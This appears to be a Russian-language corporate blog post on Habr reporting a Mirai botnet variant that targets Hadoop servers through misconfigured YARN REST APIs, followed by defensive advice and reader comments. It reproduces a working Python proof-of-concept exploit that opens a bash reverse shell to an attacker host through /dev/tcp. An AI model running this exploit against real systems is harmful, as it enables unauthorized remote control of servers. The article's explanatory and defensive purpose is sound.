Кроме IoT: ботнет Mirai начал атаковать машины на Linux

    Ботнет Mirai появился в 2016 году и за короткое время успел заразить более 600 тыс. IoT-устройств. На прошлой неделе стало известно о новой версии Mirai, цель которой — Linux-серверы с Hadoop. Разбираемся, какую уязвимость использует вирус и как её «прикрыть».


    / Flickr / D J Shin / CC BY-SA

    Пара слов о Mirai


    Mirai стал известен благодаря серии громких атак. Одна была на блог журналиста Брайана Кребса (Brian Krebs) после публикации статьи о продажах услуг ботнетов. Другая — на крупного DNS-провайдера Dyn, что вызвало сбой в работе мировых сервисов: Twitter, Reddit, PayPal, GitHub и многих других.

    Для «захвата» IoT-устройств ботнет использовал уязвимость, связанную со слабыми паролями (производители делали их одинаковыми для всех смарт-девайсов). Вредонос мониторил интернет на наличие открытых telnet-портов и вводил перебором известные пары логин-пароль для доступа к учетной записи владельца устройства. В случае успеха гаджет становился частью «вредоносной сети».

    В конце 2016 года разработчики выложили исходные коды вируса в сеть. Это привело к появлению ещё нескольких версий зловредного ПО, но все они делали своей целью устройства интернета вещей. До недавнего времени — теперь возник червь Mirai, который атакует Linux-серверы в дата-центрах.

    Ботнет «вербует» Linux


    Отчет о новой версии Mirai опубликовали специалисты по информационной безопасности компании NETSCOUT. Известно, что ботнет атакует серверы с установленным фреймворком Apache Hadoop. Как говорят специалисты по ИБ, хакеров привлекает мощность железа. Hadoop используется на серверах, занятых высокопроизводительными вычислениями и работой с алгоритмами машинного обучения. Сеть из производительных устройств позволит совершать более разрушительные DDoS-атаки.

    Вариант Mirai для Linux по-прежнему взламывает системы путем подбора заводских учетных данных по telnet. Но теперь программе не нужно различать разные виды архитектур IoT-гаджетов, Mirai атакует только серверы с процессорами x86.
    При этом новый ботнет не ставит вредоносное ПО на взломанное устройство самостоятельно. Червь отправляет злоумышленникам IP-адрес уязвимой машины и пару логин-пароль для неё. Затем хакеры устанавливают DDoS-ботов вручную.

    Какую уязвимость используют


    Вредонос использует для проникновения на сервер уязвимость модуля YARN, отвечающего за управление ресурсами кластеров и планирование заданий в Apache Hadoop.

    При неверной конфигурации YARN атакующий может получить доступ к внутреннему REST API системы через порты 8088 и 8090. Подключаясь удаленно, злоумышленник получает возможность добавить в кластер новое приложение. К слову, об этой проблеме известно уже несколько лет — на ExploitDB и GitHub опубликованы PoC-эксплоиты.

    Например, на GitHub представлен следующий код эксплойта:

    #!/usr/bin/env python
    
    import requests
    
    target = 'http://127.0.0.1:8088/'
    lhost = '192.168.0.1' # put your local host ip here, and listen at port 9999
    
    url = target + 'ws/v1/cluster/apps/new-application'
    resp = requests.post(url)
    app_id = resp.json()['application-id']
    url = target + 'ws/v1/cluster/apps'
    data = {
        'application-id': app_id,
        'application-name': 'get-shell',
        'am-container-spec': {
            'commands': {
                'command': '/bin/bash -i >& /dev/tcp/%s/9999 0>&1' % lhost,
            },
        },
        'application-type': 'YARN',
    }
    requests.post(url, json=data)
    

    Кроме Mirai, эту уязвимость использует другой DDoS-бот — DemonBot, который обнаружили в октябре специалисты компании Radware. С начала осени они регистрировали более миллиона попыток взлома через уязвимость YARN ежедневно.

    Что говорят эксперты


    По словам ИБ-специалистов, больше всего попыток взлома пришлось на США, Великобританию, Италию, Германию. На начало месяца уязвимости в YARN были подвержены чуть более тысячи серверов по всему миру. Это не так много, однако все они обладают высокой вычислительной мощностью.

    Также есть информация, что уязвимость в Hadoop может предоставить злоумышленникам доступ к данным, которые хранятся на незащищенных серверах. Пока таких случаев зарегистрировано не было, но эксперты предупреждают, что это лишь вопрос времени.

    Новый вариант Mirai распространяется не быстро — ежедневно происходит лишь несколько десятков тысяч попыток взломать Hadoop-машины через YARN. Причем все атаки идут с небольшого числа IP-адресов — не более сорока.


    / Flickr / Jelene Morris / CC BY

    Такое поведение злоумышленников и натолкнуло специалистов NETSCOUT на мысль, что вирус распространяется не автоматически — хакеры вручную сканируют интернет и внедряют программу на незащищенные машины. Это означает, что у владельцев серверов с установленным Hadoop есть больше времени на закрытие уязвимости.

    Для защиты от атаки нужно изменить настройки безопасности сети. Администраторам достаточно ограничить доступ к вычислительному кластеру — настроить IP-фильтры или полностью закрыть сеть от внешних пользователей и приложений.

    Чтобы предотвратить неавторизованный доступ к системе, специалисты по безопасности также советуют обновить Hadoop до версии 2.x и включить аутентификацию через протокол Kerberos.



    Несколько постов из блога VAS Experts:


    Пара свежих материалов из нашего блога на Хабре:

    • +17
    • 6,4k
    • 4
    VAS Experts
    145,00
    Российский разработчик DPI-системы СКАТ
    Поделиться публикацией

    Комментарии 4

      0
      >обновить Hadoop до версии 2.x

      Слабо верится, что на сегодня есть такие, кто все еще живет на версиях более старых. У нас сейчас 2.6, и это уже приличное старье (с тех пор вышло версий пять наверное).

      Ну и самое главное — те, у кого порты Yarn REST торчат наружу неприкрытые ничем — ССЗБ по определению. Ибо Yarn это планировщик задач Hadoop, запуск приложений — это его основное назначение. Это ровно тоже самое, что открыть ssh для доступа без пароля.

      И еще можно Webhdfs открыть, совсем уж для полноты картины :)
        0
        Какбуд-то в IoT-устройствах не безумным было выпячивать наружу telnet с фиксированными логин/пароль?!?!

        Однако-ж…
          0
          Ну, оно конечно похоже, да не совсем. Потенциальные потери в денежках сильно другие.

          В случае Hadoop, во-первых, у вас на кластере возможно лежит куча ваших данных, которые стоят денег — и немалых. Во-вторых, кучу денег стоит сам кластер, потому что железки там обычно не совсем рядовые. Ну и в третьих, всю установку как правило проводит собственный админ или devops, а то и не один.

          А то, что торчит за внешний периметр, еще и безопасники и сетевики отдельно посмотрят (и в серьезных конторах по умолчанию порты и IP скорее будет закрыты, чем открыты).

          И это вот третье и четвертое — оно самое главное, потому что в случае чего, спросят с админов, а не с непонятного производителя устройства.
            0

            Да. Тема другая. Совсем… Но играет то роль все тот же человеческий фактор.

      Только полноправные пользователи могут оставлять комментарии. Войдите, пожалуйста.

      Самое читаемое